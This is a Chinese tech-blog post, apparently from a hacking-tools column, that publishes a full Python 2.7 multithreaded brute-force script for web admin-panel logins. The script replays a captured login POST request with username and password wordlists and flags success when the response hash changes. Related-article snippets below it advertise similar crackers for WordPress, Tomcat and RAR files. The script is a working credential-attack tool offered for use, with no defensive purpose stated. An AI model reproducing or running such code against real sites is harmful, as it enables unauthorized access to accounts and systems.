python版通用后台账号密码多线程爆破必杀器

最新推荐文章于 2024-05-01 07:44:40 发布
最新推荐文章于 2024-05-01 07:44:40 发布
阅读量4.2k 收藏 7
点赞数 1
分类专栏: Hacking T00ls 文章标签: 爆破
Hacking 同时被 2 个专栏收录
264 篇文章 1 订阅
订阅专栏
T00ls
111 篇文章 2 订阅
订阅专栏 
#! /usr/bin/env python2.7
#coding=utf-8
#通用后台账号密码多线程爆破必杀器


import re
import os
import sys
import gzip
import Queue
import getopt
import msvcrt
import urllib
import httplib
import hashlib
import urllib2
import StringIO
import threading


class hackcrack(threading.Thread):
    def __init__(self,ooldmd5,uuu,ppp):
        threading.Thread.__init__(self)
        self.ooldmd5 = ooldmd5
        self.uuu = uuu
        self.ppp = ppp
    def run(self):
        while 1:
            if queue.empty() == True:
                break
            self.crack(self.ooldmd5,self.uuu,self.ppp)
    def crack(self,ooldmd5,uuu,ppp):
        data = queue.get()
        pathes = path()
        headerses = headers()
        arg = host()
        m = re.compile('%s=(.*?)&' % uuu)
        n = re.compile('%s=(.*?)&' % ppp)     
        us = m.findall(data)
        pw = n.findall(data)   
        conn = httplib.HTTPConnection(arg)
        try:
            conn.request('POST',pathes,data,headerses)
            httpres = conn.getresponse()
            
            if ('content-encoding', 'gzip') in httpres.getheaders():
                compressedstream = StringIO.StringIO(httpres.read())  
                gzipper = gzip.GzipFile(fileobj=compressedstream)     
                ccode = gzipper.read()
            else:
                ccode = httpres.read()
            if ccode:
                newmd5 = hashlib.md5(ccode).hexdigest()
            else:
                newmd5 = hashlib.md5('mdbhack').hexdigest()
            if ooldmd5 != newmd5:
                print '\n<info> http://%s' % arg
                print '<info> http://%s%s' % (arg,pathes)
                print '<info> I Find It -------->username:%s password:%s<--------' % (us[0],pw[0])
                print ccode
                os._exit(1)
            else:
                print '[%s] hacking -------->username:%s password:%s' % (queue.qsize(),us[0],pw[0])
                #print ccode
        except:
            pass        

class ThreadGetKey(threading.Thread):
    def run(self):
        try:           
            chr = msvcrt.getch()
            if chr == 'q':
                print "stopped by your action ( q )"
                os._exit(1)
        except:
            os._exit(1)



def info():
    print '''
     ,--^----------,--------,-----,-------^--,
     | |||||||||   `--------'     |          O ..
     `+---------------------------^----------|
       `\_,-------, ___@ mdbhack#QQ.com______|
         / XXXXXX /`|     /
        / XXXXXX /  `\   /
       / XXXXXX /\______(
      / XXXXXX /        
     / XXXXXX /
    (________(    For example:
     `------'         crack.py -u username -p password
    
    '''


def path():
    f = open('headers.txt','r')
    for p in f:
        if 'POST' in p:
            path = p.split(' ')[1].strip()
            #print path
            return path
def headers():
    headers = {}
    hheader = ['Host','User-Agent','Accept','Accept-Language','Accept-Encoding','Referer','Cookie','Connection','Content-Type']
    f = open('headers.txt','r')
    for p in f:
        for hh in hheader:
            if hh in p:
                headers[hh] = p.split(':',1)[1].strip()    
    return headers
def host():
    f = open('headers.txt','r')
    for p in f:
        if 'Host' in p:
            arg = p.split(':')[1].strip()
    #print arg
    return arg

def testcrack(username,password):
    pathes = path()
    arg = host()
    headerses = headers()
    
    getusername = username
    getpassword = password
    f = open('headers.txt','r')
    for xxx in f:
        if '&' in xxx and '=' in xxx:
            getdata = xxx.strip()  
    getpw = re.compile('%s=(.*?)&' % password)
    getusern = re.compile('%s=(.*?)&' % username)    
    bb = getpw.sub('%s=%s&' % (password,'mdbhackcom'),getdata)
    data = getusern.sub('%s=%s&' % (username,'mdbhack'),bb)
    conn = httplib.HTTPConnection(arg)
    conn.request('POST',pathes,data,headerses)
    httpres = conn.getresponse()
    if ('content-encoding', 'gzip') in httpres.getheaders():
        compressedstream = StringIO.StringIO(httpres.read())  
        gzipper = gzip.GzipFile(fileobj=compressedstream)     
        code = gzipper.read()
    else:
        code = httpres.read()
    if code:
        oldmd5 = hashlib.md5(code).hexdigest()
    else:
        oldmd5 = hashlib.md5('mdbhack').hexdigest()
    
    return oldmd5
    
def crack(username,password):
    global queue,ooldmd5
    threads = []
    line = 5
    queue = Queue.Queue()
    pathes = path()
    arg = host()
    ooldmd5 = testcrack(username,password)
    headerses = headers()
    f = open('headers.txt','r')
    for xxx in f:
        if '&' in xxx and '=' in xxx:
            getdata = xxx.strip()
    for us in open('username.txt','r'):
        print '<info> Scan Username is %s ' % us.strip()
        for pw in open('password.txt','r'):
            getpw = re.compile('%s=(.*?)&' % password)
            getusern = re.compile('%s=(.*?)&' % username)
            bb = getpw.sub('%s=%s&' % (password.strip(),urllib2.quote(pw.strip())),getdata)
            data = getusern.sub('%s=%s&' % (username,urllib2.quote(us.strip())),bb)
            queue.put(data)



        shouhu = ThreadGetKey()
        shouhu.setDaemon(True)
        shouhu.start()
        
        for x in range(line):
            y = hackcrack(ooldmd5,username,password)
            y.start()
            threads.append(y)
        for x in threads:
            x.join()
        
        
    

if __name__ == '__main__':
    if len(sys.argv) == 5:
        f = open('headers.txt','r')
        for xxx in f:
            if '&' in xxx and '=' in xxx:
                getdata = xxx.strip()        
        try:
            opts, args = getopt.getopt (sys.argv[1:], "u:p:")#Assigning Parameters
        except:
            info()
            sys.exit(1)
        for opt,arg in opts:#Traversal
            if opt == '-u':
                if arg.strip() in getdata:
                    username = arg.strip()
                else:
                    print '\nusername table %s is Wrong' % arg.strip()
                    username = ''
            elif opt == '-p':
                if arg.strip() in getdata:
                    password = arg.strip()
                else:
                    print 'password table %s is Wrong' % arg.strip()
                    password = ''
            else:
                info()
                sys.exit(1)
        if username and password:
            crack(username,password)
        else:
            sys.exit(1)
        
    else:
        info()
        sys.exit(1)
7禧
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Python3 实现网站后台弱口令爆破多线程
Z_LiT0的博客
12-01 5325
首先,你得有一个好的密码字典。 程序仅用于学习和交流,如果有更好的功能或不足请告知我! 运行程序前需要burpsuite 或者其他代理拦截,得到post以及爆破实际网址才能继续进行。
Python安全脚本之密码爆破脚本编写
weixin_60830484的博客
03-18 516
本文讲解了简单的密码爆破脚本的编写以及对应的优化思路
一款Web 弱口令(后台密码)爆破\检测工具-Boom
siu~
08-18 1698
Boom 是一款基于无头浏览的智能 Web 弱口令(后台密码)爆破\检测工具
2024年Python最新Python多线程对RAR文件密码爆破_unrar 多线程解压
最新发布
2401_84558326的博客
05-01 171
RAR文件是一种常见的压缩文件格式,经常用于将多个文件打包成一个文件以节省存储空间或方便传输。但是,如果我们忘记了RAR文件的密码,或者需要获取受保护的RAR文件的内容,就需要使用密码爆破技术。本文将介绍如何使用Python编程语言进行RAR文件密码爆破
python 破解wp博客后台登陆密码
rocky的专栏
05-24 2279
当时自己架设wp的时候发现默认居然没有验证码,于是写了个小脚本,跑了下。 居然还拿到不少后台。 惊 代码:python 暴力破解wordpress博客后台登陆密码 (上面只是截取了一个本地的)
python脚本7-爆破woniusales
m0_61786761的博客
09-21 294
【代码】python脚本7-爆破woniusales。
Python3多线程TCP端口扫描
09-18
主要为大家详细介绍了Python3多线程TCP端口扫描,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
python 使用多线程创建一个Buffer缓存的实现思路
09-16
Python中,多线程是并发执行任务的一种方式,可以提高程序的执行效率。本文将详细介绍如何使用多线程来创建一个Buffer缓存,以解决数据传输与处理速度不匹配的问题,如在人脸识别场景中图片传输和GPU处理速度的...
python实现多线程网页下载
09-20
Python实现多线程网页下载详解】 在Python中,多线程被广泛用于提高程序的执行效率,尤其是在处理I/O密集型任务如网络下载时。本篇文章将深入讲解如何利用Python实现一个简单的多线程网页下载。该下载采用...
深入理解 Python 中的多线程 新手必看
09-21
Python中,虽然存在全局解释锁(GIL),但在这个场景下,GIL不会影响到多线程执行网络请求的效果,因为网络I/O操作本质上是非阻塞的,线程在等待网络响应时会被挂起,此时CPU可以切换到其他线程继续工作。...
python批量爆破后台目录脚本
weixin_30788239的博客
08-07 769
1 # -*- coding:utf-8 -*- 2 # 运行环境为python3.0 作者:Screw 3 4 import requests 5 url=input("输入你的url :") 6 script=int(input("选择脚本1.asp 2.php 3.jsp 4.sapx :")) 7 true_script="" 8 ture_...
python3实现多线程破解tomcat简单密码
09-16
python3 http.client库实现的登录验证密码程序。 内含多个密码文件。 for server in ip: print( "[+] Server:",server) print ("[+] Port:",port) print ("[+] Users Loaded:",len(WEAK_USERNAME)) print( "[+] Words Loaded:",len(WEAK_PASSWORD)) print ("[+] Started",timer(),"\n") for I in range(len(accounts)): work = Tomcatbrute(server,port,path,accounts[I][0],accounts[I][1]) work.setDaemon(1) work.start() time.sleep(0.1) print( "\n[-] Done -",timer(),"\n" )
使用python3对tomcat后台爆破
qq_35492650的博客
10-28 961
通过分析 import requests import base64 url = "http://127.0.0.1:8080/manager/html" with open("dict.txt", "r") as f: while 1: passwd = f.readline()[:-1] if passwd == "": bre...
全网最全系统学习爬虫教程,用爬虫进行数据分析(bs4,xpath,正则表达式)
m0_59164304的博客
05-25 2178
1.bs4解析基础 2.bs4案例 3.xpath解析基础 4.xpath解析案例-4k图片解析爬取 5.xpath解析案例-58二手房 6.xpath解析案例-爬取站长素材中免费简历模板 7.xpath解析案例-全国城市名称爬取 8.正则解析 9.正则解析-分页爬取 10.爬取图片 1.bs4解析基础 from bs4 import BeautifulSoup fp = open('第三章 数据分析/text.html','r',encoding='utf-8') soup = BeautifulSo
python 写的http后台弱口令爆破工具
byteway的专栏
12-12 6168
利用python 写的多线程爆破后台用户名+密码(自备字典),比较实用,即使是在信息安全这么重视的今天,还是有人不加验证码或者异常访问限制之类的登陆验证方式,这样就很容易被弱口令爆破工具拿下,(本代码仅限学习实用,禁止进行web攻击,不承担法律责任)
wordpress后台暴力破解(python)
收集盒 Book box
07-03 1214
#Coding = UTF-8  02 import urllib, time, sys  03  04 start = time.time()  05 errors = []  06 def exploit(url, name, dictionary):  07 for line in open(dictionary):  08 line = line.
获取路由ISP密码,以及路由ISP密码为Hello123World的原因
Think88666的博客
02-03 3940
一般情况下,路由都会隐藏isp密码,今天尝试了一台路由,无论是修改HTML代码还是用wireshark抓http包,发现密码都是Hello123World,当然这是错误的,不过是路由给了个假密码罢了。 那怎么样获取真正的路由密码呢?通过这个工具即可:RouterPassView.exe ,当前本1.88 将路由配置文件备份得到.bin的文件,将文件导入到该工具即可获取路由的密码...
python爆破示例_用python爆破某会员网站
weixin_33335559的博客
01-12 629
暑假在家上网,qq群里一位好友给我说他想要某个网站的会员,ps(是个小网站),本着助人为乐的精神我去踩了点。。。是吗然后就有了思路(骚操作)先讲一下思路1 .先注册用户登录2.flidder抓包3.python 模拟登录4.在评论区抓取评论的用户名5.弱密码爆破登录登录页面如下登录页面.pngflidder抓包抓包之后发现有以下几个字段'log': 'admin', # 用户名'pwd': '...
python多线程爆破子域名
07-27
Python多线程爆破子域名是一种利用Python编程语言的多线程技术来自动化执行子域名爆破过程的方法。子域名爆破是通过在一个域名的子域上尝试不同的组合,以便找到可能存在的其他域名或子域名。以下是关于使用Python多线程来实现子域名爆破的简要说明: 首先,我们需要导入所需的Python库,如`requests`和`threading`。 然后,我们可以编写一个函数,用于检查子域名是否存在。这个函数将接受一个要检查的子域名作为参数,并使用`requests`库向该子域名发送HTTP请求。如果返回状态码为200,则表示该子域名存在;否则,该子域名不存在。 接下来,我们可以编写一个主函数,在这个函数里,我们可以定义一个子域名列表,可以从字典文件或其他来源获取。然后,我们可以创建多个线程来并发检查这些子域名。可以使用`threading`库来实现多线程。 在主函数中,我们可以定义一个线程池,并为每个子域名创建一个线程。然后,我们可以调用`start`方法来启动这些线程。一旦所有线程完成任务,我们可以调用`join`方法,以确保所有线程都已经完成。 最后,我们可以将结果输出到文件或其他适当的位置,以便后续分析。 需要注意的是,子域名爆破可能涉及到违反服务商规定的活动,因此在使用此技术时应遵循法律和道德规范,并获得相关授权和许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值